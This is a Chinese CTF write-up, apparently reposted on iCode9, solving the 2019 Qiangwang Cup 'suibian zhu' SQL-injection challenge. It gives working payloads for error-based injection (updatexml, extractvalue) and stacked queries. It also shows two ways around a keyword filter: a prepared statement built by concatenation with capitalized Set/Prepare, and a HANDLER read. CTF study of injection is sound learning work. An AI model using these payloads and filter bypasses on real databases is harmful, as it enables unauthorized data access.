ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

[强网杯 2019]随便注

2020-06-19 10:07:30  阅读:428  来源: 互联网

标签:name prepare 0x7e stmt 随便 强网杯 2019 sql 1919810931114514


首先查看源代码

 

没有什么可以利用的东西

题目所是注入的题,所以使用单引号尝试是否报错

 

因为出现了报错,所以可以直接尝试使用报错注入

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

发现提示下图,关键字被过滤

 

换一个报错注入函数

1' and (extractvalue(1,concat(0x7e,user(),0x7e)));--+

1' and (extractvalue(1,concat(0x7e,database(),0x7e)));--+

因为select,where被过滤,所以无法使用报错注入进行接下来的操作

另外盲注,bool注入也会变得很困难,陷入沉思。。。。。。

查看我的葵花宝典

 

 发现堆叠查询注入还没有祭出

1';show databases;--+

 

1';show tables;--+

不知道flag在那个数据库中的,我们可以使用desc来确认

1';desc `1919810931114514`;--+

1';desc `words`;--+

接下来该执行如下语句,但是select关键字被过滤

select * from `1919810931114514`;

这里开始我就不会做了,于是参考了别人的wp

 

这里需要绕过select的限制,我们可以使用预编译的方式

 

预编译相关语法如下:

set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句

payload:

-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

格式化一下

-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;
#

语句执行后,发现被strstr函数过滤set和prepare关键字,可以尝试使用双写绕过,或者大小写绕过

 

strstr($inject, "set") && strstr($inject, "prepare")

strstr这个函数并不能区分大小写,我们将其大写即可

payload:

-1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;#

拆分开来如下:
-1';
Set @sql = CONCAT('se','lect * from `1919810931114514`;');
Prepare stmt from @sql;
EXECUTE stmt;
#

 另外还可以使用handler,代替select关键字

hanlder语法

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE
handler `1919810931114514` open;
handler `1919810931114514` read first;

payload:

1';handler `1919810931114514` open;handler `1919810931114514` read first;--+

标签:name,prepare,0x7e,stmt,随便,强网杯,2019,sql,1919810931114514
来源: https://www.cnblogs.com/gtx690/p/13161504.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有